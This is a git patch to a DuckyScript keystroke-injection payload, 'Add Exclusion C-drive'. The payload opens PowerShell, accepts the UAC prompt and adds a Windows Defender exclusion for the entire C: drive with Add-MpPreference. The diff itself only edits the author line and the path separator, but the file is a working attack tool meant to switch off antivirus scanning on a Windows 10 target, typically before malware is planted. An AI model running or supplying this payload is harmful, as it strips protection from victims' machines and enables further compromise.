From 23de20496cf63833ff6aad66b49b26febd5f84de Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Wed, 10 May 2023 12:59:05 +0000 Subject: [PATCH] Update Add Exclusion C-drive.txt --- Tools/Add Exclusion C-drive.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Tools/Add Exclusion C-drive.txt b/Tools/Add Exclusion C-drive.txt index 32774f3..a701968 100644 --- a/Tools/Add Exclusion C-drive.txt +++ b/Tools/Add Exclusion C-drive.txt @@ -1,5 +1,5 @@ REM Title: Add Exclusion C-drive -REM Author: @beigeworm +REM Author: @beigeworm | https://github.com/beigeworm REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ REM Target: Windows 10 @@ -16,7 +16,7 @@ ALT y DELAY 5000 REM add the exclusion path. -STRING Add-MpPreference -ExclusionPath C:/ +STRING Add-MpPreference -ExclusionPath C:\ ENTER DELAY 250 STRING exit